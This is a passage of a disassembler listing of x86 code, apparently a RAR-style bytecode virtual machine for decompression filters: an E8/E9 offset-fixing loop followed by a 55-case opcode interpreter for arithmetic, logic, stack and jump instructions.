cmp al, 0E8h
jz short loc_9B4211
cmp al, bl
jnz short loc_9B423A
loc_9B4211: ; CODE XREF: sub_9B3D50+4BB�j
mov eax, [edx]
test eax, eax
jge short loc_9B4225
lea edi, [esi+eax]
test edi, edi
jl short loc_9B4230
add eax, 1000000h
jmp short loc_9B422E
; ---------------------------------------------------------------------------
loc_9B4225: ; CODE XREF: sub_9B3D50+4C5�j
cmp eax, 1000000h
jge short loc_9B4230
sub eax, esi
loc_9B422E: ; CODE XREF: sub_9B3D50+4D3�j
mov [edx], eax
loc_9B4230: ; CODE XREF: sub_9B3D50+4CC�j
; sub_9B3D50+4DA�j
add [ebp+var_20], 4
add edx, 4
add esi, 4
loc_9B423A: ; CODE XREF: sub_9B3D50+4BF�j
cmp [ebp+var_20], ecx
jb short loc_9B4202
loc_9B423F: ; CODE XREF: sub_9B3D50+41�j
; sub_9B3D50+54�j ...
pop ebx
loc_9B4240: ; CODE XREF: sub_9B3D50+E�j
pop edi
pop esi
leave
retn
sub_9B3D50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B4244 proc near ; CODE XREF: sub_9B494C+96�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
lea eax, [eax+eax*4]
push ebx
lea eax, [edx+eax*8]
cmp edx, eax
mov ebx, edx
push esi
mov [ebp+var_4], 17D7840h
mov [ebp+var_8], ebx
mov [ebp+var_10], eax
jbe short loc_9B4274
loc_9B426B: ; CODE XREF: sub_9B4244+32�j
; sub_9B4244+2A0�j ...
xor eax, eax
loc_9B426D: ; CODE XREF: sub_9B4244+626�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B4271: ; CODE XREF: sub_9B4244+618�j
mov edx, [ebp+arg_0]
loc_9B4274: ; CODE XREF: sub_9B4244+25�j
cmp ebx, edx
jb short loc_9B426B
lea eax, [ebx+8]
push edi
call sub_9B3CA3
mov esi, eax
lea eax, [ebx+18h]
push edi
call sub_9B3CA3
pop ecx
pop ecx
mov ecx, [ebx]
cmp ecx, 36h ; switch 55 cases
ja loc_9B4850 ; default
; jumptable 009B4299 case 39
jmp off_9B4870[ecx*4] ; switch jump
loc_9B42A0: ; DATA XREF: .text:off_9B4870�o
cmp dword ptr [ebx+4], 0 ; jumptable 009B4299 case 0
jz short loc_9B42AE ; jumptable 009B4299 case 41
movzx eax, byte ptr [eax]
jmp loc_9B477D
; ---------------------------------------------------------------------------
loc_9B42AE: ; CODE XREF: sub_9B4244+55�j
; sub_9B4244+60�j
; DATA XREF: ...
mov eax, [eax] ; jumptable 009B4299 case 41
loc_9B42B0: ; CODE XREF: sub_9B4244+32C�j
; sub_9B4244+4AC�j ...
mov [esi], eax
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B42B7: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov al, [eax] ; jumptable 009B4299 case 40
jmp loc_9B477D
; ---------------------------------------------------------------------------
loc_9B42BE: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 1
test ecx, ecx
jz short loc_9B42CA
movzx esi, byte ptr [esi]
jmp short loc_9B42CC
; ---------------------------------------------------------------------------
loc_9B42CA: ; CODE XREF: sub_9B4244+7F�j
mov esi, [esi]
loc_9B42CC: ; CODE XREF: sub_9B4244+84�j
test ecx, ecx
jz short loc_9B42D5
movzx eax, byte ptr [eax]
jmp short loc_9B42D7
; ---------------------------------------------------------------------------
loc_9B42D5: ; CODE XREF: sub_9B4244+8A�j
mov eax, [eax]
loc_9B42D7: ; CODE XREF: sub_9B4244+8F�j
mov ecx, esi
sub ecx, eax
loc_9B42DB: ; CODE XREF: sub_9B4244+E0�j
jnz short loc_9B42E5
loc_9B42DD: ; CODE XREF: sub_9B4244:loc_9B4491�j
push 2
pop eax
jmp loc_9B449C
; ---------------------------------------------------------------------------
loc_9B42E5: ; CODE XREF: sub_9B4244:loc_9B42DB�j
cmp esi, ecx
sbb eax, eax
neg eax
and ecx, 80000000h
or eax, ecx
jmp loc_9B449C
; ---------------------------------------------------------------------------
loc_9B42F8: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
movzx ecx, byte ptr [esi] ; jumptable 009B4299 case 42
movzx edx, byte ptr [eax]
mov eax, ecx
sub eax, edx
jnz short loc_9B4309
push 2
pop ecx
jmp short loc_9B4316
; ---------------------------------------------------------------------------
loc_9B4309: ; CODE XREF: sub_9B4244+BE�j
cmp ecx, eax
sbb ecx, ecx
neg ecx
and eax, 80000000h
or ecx, eax
loc_9B4316: ; CODE XREF: sub_9B4244+C3�j
mov [edi+24h], ecx
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B431E: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov esi, [esi] ; jumptable 009B4299 case 43
mov ecx, esi
sub ecx, [eax]
jmp short loc_9B42DB
; ---------------------------------------------------------------------------
loc_9B4326: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 2
test ecx, ecx
jz short loc_9B4332
movzx edx, byte ptr [esi]
jmp short loc_9B4334
; ---------------------------------------------------------------------------
loc_9B4332: ; CODE XREF: sub_9B4244+E7�j
mov edx, [esi]
loc_9B4334: ; CODE XREF: sub_9B4244+EC�j
test ecx, ecx
jz short loc_9B433D
movzx eax, byte ptr [eax]
jmp short loc_9B433F
; ---------------------------------------------------------------------------
loc_9B433D: ; CODE XREF: sub_9B4244+F2�j
mov eax, [eax]
loc_9B433F: ; CODE XREF: sub_9B4244+F7�j
lea ecx, [eax+edx]
test ecx, ecx
jz loc_9B4462
cmp ecx, edx
jmp short loc_9B4385
; ---------------------------------------------------------------------------
loc_9B434E: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov al, [eax] ; jumptable 009B4299 case 44
add [esi], al
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4357: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov eax, [eax] ; jumptable 009B4299 case 45
add [esi], eax
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4360: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 3
test ecx, ecx
jz short loc_9B436C
movzx edx, byte ptr [esi]
jmp short loc_9B436E
; ---------------------------------------------------------------------------
loc_9B436C: ; CODE XREF: sub_9B4244+121�j
mov edx, [esi]
loc_9B436E: ; CODE XREF: sub_9B4244+126�j
test ecx, ecx
jz short loc_9B4377
movzx eax, byte ptr [eax]
jmp short loc_9B4379
; ---------------------------------------------------------------------------
loc_9B4377: ; CODE XREF: sub_9B4244+12C�j
mov eax, [eax]
loc_9B4379: ; CODE XREF: sub_9B4244+131�j
mov ecx, edx
sub ecx, eax
jz loc_9B4462
cmp edx, ecx
loc_9B4385: ; CODE XREF: sub_9B4244+108�j
sbb eax, eax
mov edx, ecx
neg eax
and edx, 80000000h
or eax, edx
jmp loc_9B4630
; ---------------------------------------------------------------------------
loc_9B4398: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov al, [eax] ; jumptable 009B4299 case 46
sub [esi], al
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B43A1: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov eax, [eax] ; jumptable 009B4299 case 47
sub [esi], eax
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B43AA: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+24h], 2 ; jumptable 009B4299 case 4
jmp loc_9B44BA
; ---------------------------------------------------------------------------
loc_9B43B3: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+24h], 2 ; jumptable 009B4299 case 5
jmp loc_9B44CC
; ---------------------------------------------------------------------------
loc_9B43BC: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 6
test ecx, ecx
jz short loc_9B43C8
movzx eax, byte ptr [esi]
jmp short loc_9B43CA
; ---------------------------------------------------------------------------
loc_9B43C8: ; CODE XREF: sub_9B4244+17D�j
mov eax, [esi]
loc_9B43CA: ; CODE XREF: sub_9B4244+182�j
inc eax
jmp short loc_9B43F3
; ---------------------------------------------------------------------------
loc_9B43CD: ; CODE XREF: sub_9B4244+1B1�j
mov [esi], eax
loc_9B43CF: ; CODE XREF: sub_9B4244+1B5�j
test eax, eax
jmp loc_9B4491
; ---------------------------------------------------------------------------
loc_9B43D6: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
inc byte ptr [esi] ; jumptable 009B4299 case 48
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B43DD: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
inc dword ptr [esi] ; jumptable 009B4299 case 49
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B43E4: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 7
test ecx, ecx
jz short loc_9B43F0
movzx eax, byte ptr [esi]
jmp short loc_9B43F2
; ---------------------------------------------------------------------------
loc_9B43F0: ; CODE XREF: sub_9B4244+1A5�j
mov eax, [esi]
loc_9B43F2: ; CODE XREF: sub_9B4244+1AA�j
dec eax
loc_9B43F3: ; CODE XREF: sub_9B4244+187�j
test ecx, ecx
jz short loc_9B43CD
mov [esi], al
jmp short loc_9B43CF
; ---------------------------------------------------------------------------
loc_9B43FB: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
dec byte ptr [esi] ; jumptable 009B4299 case 50
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4402: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
dec dword ptr [esi] ; jumptable 009B4299 case 51
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4409: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 9
test ecx, ecx
jz short loc_9B4415
movzx edx, byte ptr [esi]
jmp short loc_9B4417
; ---------------------------------------------------------------------------
loc_9B4415: ; CODE XREF: sub_9B4244+1CA�j
mov edx, [esi]
loc_9B4417: ; CODE XREF: sub_9B4244+1CF�j
test ecx, ecx
jz short loc_9B4420
movzx eax, byte ptr [eax]
jmp short loc_9B4422
; ---------------------------------------------------------------------------
loc_9B4420: ; CODE XREF: sub_9B4244+1D5�j
mov eax, [eax]
loc_9B4422: ; CODE XREF: sub_9B4244+1DA�j
xor eax, edx
jmp short loc_9B445E
; ---------------------------------------------------------------------------
loc_9B4426: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 10
test ecx, ecx
jz short loc_9B4432
movzx edx, byte ptr [esi]
jmp short loc_9B4434
; ---------------------------------------------------------------------------
loc_9B4432: ; CODE XREF: sub_9B4244+1E7�j
mov edx, [esi]
loc_9B4434: ; CODE XREF: sub_9B4244+1EC�j
test ecx, ecx
jz short loc_9B443D
movzx eax, byte ptr [eax]
jmp short loc_9B443F
; ---------------------------------------------------------------------------
loc_9B443D: ; CODE XREF: sub_9B4244+1F2�j
mov eax, [eax]
loc_9B443F: ; CODE XREF: sub_9B4244+1F7�j
and eax, edx
jmp short loc_9B445E
; ---------------------------------------------------------------------------
loc_9B4443: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 11
test ecx, ecx
jz short loc_9B444F
movzx edx, byte ptr [esi]
jmp short loc_9B4451
; ---------------------------------------------------------------------------
loc_9B444F: ; CODE XREF: sub_9B4244+204�j
mov edx, [esi]
loc_9B4451: ; CODE XREF: sub_9B4244+209�j
test ecx, ecx
jz short loc_9B445A
movzx eax, byte ptr [eax]
jmp short loc_9B445C
; ---------------------------------------------------------------------------
loc_9B445A: ; CODE XREF: sub_9B4244+20F�j
mov eax, [eax]
loc_9B445C: ; CODE XREF: sub_9B4244+214�j
or eax, edx
loc_9B445E: ; CODE XREF: sub_9B4244+1E0�j
; sub_9B4244+1FD�j
mov ecx, eax
jnz short loc_9B446A
loc_9B4462: ; CODE XREF: sub_9B4244+100�j
; sub_9B4244+139�j ...
push 2
pop eax
jmp loc_9B4630
; ---------------------------------------------------------------------------
loc_9B446A: ; CODE XREF: sub_9B4244+21C�j
mov eax, ecx
and eax, 80000000h
jmp loc_9B4630
; ---------------------------------------------------------------------------
loc_9B4476: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 12
test ecx, ecx
jz short loc_9B4482
movzx esi, byte ptr [esi]
jmp short loc_9B4484
; ---------------------------------------------------------------------------
loc_9B4482: ; CODE XREF: sub_9B4244+237�j
mov esi, [esi]
loc_9B4484: ; CODE XREF: sub_9B4244+23C�j
test ecx, ecx
jz short loc_9B448D
movzx eax, byte ptr [eax]
jmp short loc_9B448F
; ---------------------------------------------------------------------------
loc_9B448D: ; CODE XREF: sub_9B4244+242�j
mov eax, [eax]
loc_9B448F: ; CODE XREF: sub_9B4244+247�j
and eax, esi
loc_9B4491: ; CODE XREF: sub_9B4244+18D�j
jz loc_9B42DD
and eax, 80000000h
loc_9B449C: ; CODE XREF: sub_9B4244+9C�j
; sub_9B4244+AF�j
mov [edi+24h], eax
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B44A4: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+27h], 80h ; jumptable 009B4299 case 13
jmp short loc_9B44BA
; ---------------------------------------------------------------------------
loc_9B44AA: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+27h], 80h ; jumptable 009B4299 case 14
jmp short loc_9B44CC
; ---------------------------------------------------------------------------
loc_9B44B0: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+24h], 1 ; jumptable 009B4299 case 15
jmp short loc_9B44BA
; ---------------------------------------------------------------------------
loc_9B44B6: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+24h], 3 ; jumptable 009B4299 case 16
loc_9B44BA: ; CODE XREF: sub_9B4244+16A�j
; sub_9B4244+264�j ...
jz loc_9B4850 ; default
; jumptable 009B4299 case 39
jmp short loc_9B44D2 ; jumptable 009B4299 case 8
; ---------------------------------------------------------------------------
loc_9B44C2: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+24h], 3 ; jumptable 009B4299 case 17
jmp short loc_9B44CC
; ---------------------------------------------------------------------------
loc_9B44C8: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
test byte ptr [edi+24h], 1 ; jumptable 009B4299 case 18
loc_9B44CC: ; CODE XREF: sub_9B4244+173�j
; sub_9B4244+26A�j ...
jnz loc_9B4850 ; default
; jumptable 009B4299 case 39
loc_9B44D2: ; CODE XREF: sub_9B4244+55�j
; sub_9B4244+27C�j
; DATA XREF: ...
mov esi, [esi] ; jumptable 009B4299 case 8
cmp esi, [ebp+arg_4]
jnb loc_9B4867
dec [ebp+var_4]
cmp [ebp+var_4], 0
jle loc_9B426B
lea eax, [esi+esi*4]
lea ebx, [edx+eax*8]
jmp loc_9B4856
; ---------------------------------------------------------------------------
loc_9B44F5: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
add dword ptr [edi+20h], 0FFFFFFFCh ; jumptable 009B4299 case 19
mov edx, [esi]
jmp loc_9B46BD
; ---------------------------------------------------------------------------
loc_9B4500: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov eax, [edi+20h] ; jumptable 009B4299 case 20
mov ecx, [edi]
and eax, 3FFFFh
mov eax, [eax+ecx]
mov [esi], eax
add dword ptr [edi+20h], 4
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4518: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov eax, ebx ; jumptable 009B4299 case 21
sub eax, [ebp+arg_0]
push 28h
cdq
pop ebx
idiv ebx
add dword ptr [edi+20h], 0FFFFFFFCh
mov ecx, [edi+20h]
mov edx, [edi]
and ecx, 3FFFFh
inc eax
mov [ecx+edx], eax
mov esi, [esi]
cmp esi, [ebp+arg_4]
jnb loc_9B4867
dec [ebp+var_4]
cmp [ebp+var_4], 0
jle loc_9B426B
mov ecx, [ebp+arg_0]
lea eax, [esi+esi*4]
lea ebx, [ecx+eax*8]
jmp loc_9B4856
; ---------------------------------------------------------------------------
loc_9B455C: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
cmp dword ptr [ebx+4], 0 ; jumptable 009B4299 case 23
jz short loc_9B456C
movzx eax, byte ptr [esi]
not al
jmp loc_9B477D
; ---------------------------------------------------------------------------
loc_9B456C: ; CODE XREF: sub_9B4244+31C�j
mov eax, [esi]
not eax
jmp loc_9B42B0
; ---------------------------------------------------------------------------
loc_9B4575: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ebx, [ebx+4] ; jumptable 009B4299 case 24
test ebx, ebx
jz short loc_9B4581
movzx eax, byte ptr [esi]
jmp short loc_9B4583
; ---------------------------------------------------------------------------
loc_9B4581: ; CODE XREF: sub_9B4244+336�j
mov eax, [esi]
loc_9B4583: ; CODE XREF: sub_9B4244+33B�j
test ebx, ebx
jz short loc_9B458C
movzx ecx, byte ptr [esi]
jmp short loc_9B458E
; ---------------------------------------------------------------------------
loc_9B458C: ; CODE XREF: sub_9B4244+341�j
mov ecx, [esi]
loc_9B458E: ; CODE XREF: sub_9B4244+346�j
mov edx, eax
shl edx, cl
test edx, edx
jnz short loc_9B459B
push 2
pop ebx
jmp short loc_9B45A3
; ---------------------------------------------------------------------------
loc_9B459B: ; CODE XREF: sub_9B4244+350�j
mov ebx, edx
and ebx, 80000000h
loc_9B45A3: ; CODE XREF: sub_9B4244+355�j
dec ecx
shl eax, cl
shr eax, 1Fh
jmp short loc_9B45FE
; ---------------------------------------------------------------------------
loc_9B45AB: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ebx, [ebx+4] ; jumptable 009B4299 case 25
test ebx, ebx
jz short loc_9B45B7
movzx eax, byte ptr [esi]
jmp short loc_9B45B9
; ---------------------------------------------------------------------------
loc_9B45B7: ; CODE XREF: sub_9B4244+36C�j
mov eax, [esi]
loc_9B45B9: ; CODE XREF: sub_9B4244+371�j
test ebx, ebx
jz short loc_9B45C2
movzx ecx, byte ptr [esi]
jmp short loc_9B45C4
; ---------------------------------------------------------------------------
loc_9B45C2: ; CODE XREF: sub_9B4244+377�j
mov ecx, [esi]
loc_9B45C4: ; CODE XREF: sub_9B4244+37C�j
mov edx, eax
shr edx, cl
loc_9B45C8: ; CODE XREF: sub_9B4244+3AA�j
test edx, edx
jnz short loc_9B45F0
push 2
pop ebx
jmp short loc_9B45F8
; ---------------------------------------------------------------------------
loc_9B45D1: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ebx, [ebx+4] ; jumptable 009B4299 case 26
test ebx, ebx
jz short loc_9B45DD
movzx eax, byte ptr [esi]
jmp short loc_9B45DF
; ---------------------------------------------------------------------------
loc_9B45DD: ; CODE XREF: sub_9B4244+392�j
mov eax, [esi]
loc_9B45DF: ; CODE XREF: sub_9B4244+397�j
test ebx, ebx
jz short loc_9B45E8
movzx ecx, byte ptr [esi]
jmp short loc_9B45EA
; ---------------------------------------------------------------------------
loc_9B45E8: ; CODE XREF: sub_9B4244+39D�j
mov ecx, [esi]
loc_9B45EA: ; CODE XREF: sub_9B4244+3A2�j
mov edx, eax
sar edx, cl
jmp short loc_9B45C8
; ---------------------------------------------------------------------------
loc_9B45F0: ; CODE XREF: sub_9B4244+386�j
mov ebx, edx
and ebx, 80000000h
loc_9B45F8: ; CODE XREF: sub_9B4244+38B�j
dec ecx
shr eax, cl
and eax, 1
loc_9B45FE: ; CODE XREF: sub_9B4244+365�j
or eax, ebx
mov [edi+24h], eax
mov eax, [ebp+var_8]
cmp dword ptr [eax+4], 0
mov ebx, eax
jmp loc_9B4805
; ---------------------------------------------------------------------------
loc_9B4611: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
cmp dword ptr [ebx+4], 0 ; jumptable 009B4299 case 27
jz short loc_9B461C
movzx eax, byte ptr [esi]
jmp short loc_9B461E
; ---------------------------------------------------------------------------
loc_9B461C: ; CODE XREF: sub_9B4244+3D1�j
mov eax, [esi]
loc_9B461E: ; CODE XREF: sub_9B4244+3D6�j
neg eax
mov ecx, eax
jz loc_9B4462
and eax, 80000001h
or eax, 1
loc_9B4630: ; CODE XREF: sub_9B4244+14F�j
; sub_9B4244+221�j ...
mov [edi+24h], eax
cmp dword ptr [ebx+4], 0
jz short loc_9B4640
mov [esi], cl
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4640: ; CODE XREF: sub_9B4244+3F3�j
mov [esi], ecx
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4647: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
neg byte ptr [esi] ; jumptable 009B4299 case 52
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B464E: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
neg dword ptr [esi] ; jumptable 009B4299 case 53
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4655: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov eax, [edi+20h] ; jumptable 009B4299 case 28
sub eax, 4
lea ecx, [edi+4]
mov [ebp+var_C], 8
loc_9B4665: ; CODE XREF: sub_9B4244+439�j
mov ebx, [ecx]
mov esi, [edi]
mov edx, eax
and edx, 3FFFFh
add ecx, 4
sub eax, 4
dec [ebp+var_C]
mov [edx+esi], ebx
jnz short loc_9B4665
add dword ptr [edi+20h], 0FFFFFFE0h
mov ebx, [ebp+var_8]
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B468B: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
lea eax, [edi+20h] ; jumptable 009B4299 case 29
mov ecx, [eax]
mov [ebp+var_C], 8
loc_9B4697: ; CODE XREF: sub_9B4244+46B�j
mov esi, [edi]
mov edx, ecx
and edx, 3FFFFh
mov edx, [edx+esi]
mov [eax], edx
sub eax, 4
add ecx, 4
dec [ebp+var_C]
jnz short loc_9B4697
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B46B6: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
add dword ptr [edi+20h], 0FFFFFFFCh ; jumptable 009B4299 case 30
mov edx, [edi+24h]
loc_9B46BD: ; CODE XREF: sub_9B4244+2B7�j
mov eax, [edi+20h]
mov ecx, [edi]
and eax, 3FFFFh
mov [eax+ecx], edx
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B46CF: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov eax, [edi+20h] ; jumptable 009B4299 case 31
mov edx, [edi]
mov ecx, eax
and ecx, 3FFFFh
mov ecx, [ecx+edx]
add eax, 4
mov [edi+24h], ecx
mov [edi+20h], eax
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B46ED: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
movzx eax, byte ptr [eax] ; jumptable 009B4299 case 32
jmp loc_9B42B0
; ---------------------------------------------------------------------------
loc_9B46F5: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
movsx eax, byte ptr [eax] ; jumptable 009B4299 case 33
jmp loc_9B42B0
; ---------------------------------------------------------------------------
loc_9B46FD: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov ecx, [ebx+4] ; jumptable 009B4299 case 34
test ecx, ecx
jz short loc_9B4709
movzx edx, byte ptr [esi]
jmp short loc_9B470B
; ---------------------------------------------------------------------------
loc_9B4709: ; CODE XREF: sub_9B4244+4BE�j
mov edx, [esi]
loc_9B470B: ; CODE XREF: sub_9B4244+4C3�j
test ecx, ecx
jz short loc_9B4716
movzx ecx, byte ptr [eax]
mov [esi], cl
jmp short loc_9B471A
; ---------------------------------------------------------------------------
loc_9B4716: ; CODE XREF: sub_9B4244+4C9�j
mov ecx, [eax]
mov [esi], ecx
loc_9B471A: ; CODE XREF: sub_9B4244+4D0�j
cmp dword ptr [ebx+4], 0
jz short loc_9B4727
mov [eax], dl
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4727: ; CODE XREF: sub_9B4244+4DA�j
mov [eax], edx
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B472E: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov edx, [ebx+4] ; jumptable 009B4299 case 35
test edx, edx
jz short loc_9B473A
movzx ecx, byte ptr [esi]
jmp short loc_9B473C
; ---------------------------------------------------------------------------
loc_9B473A: ; CODE XREF: sub_9B4244+4EF�j
mov ecx, [esi]
loc_9B473C: ; CODE XREF: sub_9B4244+4F4�j
test edx, edx
jz short loc_9B4745
movzx eax, byte ptr [eax]
jmp short loc_9B4747
; ---------------------------------------------------------------------------
loc_9B4745: ; CODE XREF: sub_9B4244+4FA�j
mov eax, [eax]
loc_9B4747: ; CODE XREF: sub_9B4244+4FF�j
imul eax, ecx
test edx, edx
jmp short loc_9B4777
; ---------------------------------------------------------------------------
loc_9B474E: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov edx, [ebx+4] ; jumptable 009B4299 case 36
test edx, edx
jz short loc_9B475A
movzx ecx, byte ptr [eax]
jmp short loc_9B475C
; ---------------------------------------------------------------------------
loc_9B475A: ; CODE XREF: sub_9B4244+50F�j
mov ecx, [eax]
loc_9B475C: ; CODE XREF: sub_9B4244+514�j
test ecx, ecx
jz loc_9B4850 ; default
; jumptable 009B4299 case 39
test edx, edx
jz short loc_9B476D
movzx eax, byte ptr [esi]
jmp short loc_9B476F
; ---------------------------------------------------------------------------
loc_9B476D: ; CODE XREF: sub_9B4244+522�j
mov eax, [esi]
loc_9B476F: ; CODE XREF: sub_9B4244+527�j
xor edx, edx
div ecx
cmp dword ptr [ebx+4], 0
loc_9B4777: ; CODE XREF: sub_9B4244+508�j
jz loc_9B42B0
loc_9B477D: ; CODE XREF: sub_9B4244+65�j
; sub_9B4244+75�j ...
mov [esi], al
jmp loc_9B4850 ; default
; jumptable 009B4299 case 39
; ---------------------------------------------------------------------------
loc_9B4784: ; CODE XREF: sub_9B4244+55�j
; DATA XREF: .text:off_9B4870�o
mov edx, [ebx+4] ; jumptable 009B4299 case 37
test edx, edx
jz short loc_9B4790
movzx ecx, byte ptr [esi]
jmp short loc_9B4792
; ---------------------------------------------------------------------------
loc_9B4790: ; CODE XREF: sub_9B4244+545�j
mov ecx, [esi]
loc_9B4792: ; CODE XREF: sub_9B4244+54A�j
mov [ebp+var_8], ecx
mov ecx, [edi+24h]
and ecx, 1
test edx, edx
jz short loc_9B47A4
movzx eax, byte ptr [eax]
jmp short loc_9B47A6
; ---------------------------------------------------------------------------
loc_9B47A4: ; CODE XREF: sub_9B4244+559�j
mov eax, [eax]
loc_9B47A6: ; CODE XREF: sub_9B4244+55E�j
lea edx, [eax+ecx]
add edx, [ebp+var_8]
jnz short loc_9B47B3
loc_9B47AE: ; CODE XREF: sub_9B4244+5A7�j
push 2
pop eax
jmp short loc_9B47FE
; ---------------------------------------------------------------------------
loc_9B47B3: ; CODE XREF: sub_9B4244+568�j
cmp edx, [ebp+var_8]
jb short loc_9B47F2
loc_9B47B8: ; CODE XREF: sub_9B4244+5AC�j
jnz short loc_9B47BE
test ecx, ecx
jnz short loc_9B47F2
loc_9B47BE: ; CODE XREF: sub_9B4244:loc_9B47B8�j
xor ecx, ecx
jmp short loc_9B47F5
; ---------------------------------------------------------------------------
loc_9B47C2: ; CODE XREF: sub_9B4244+55�j
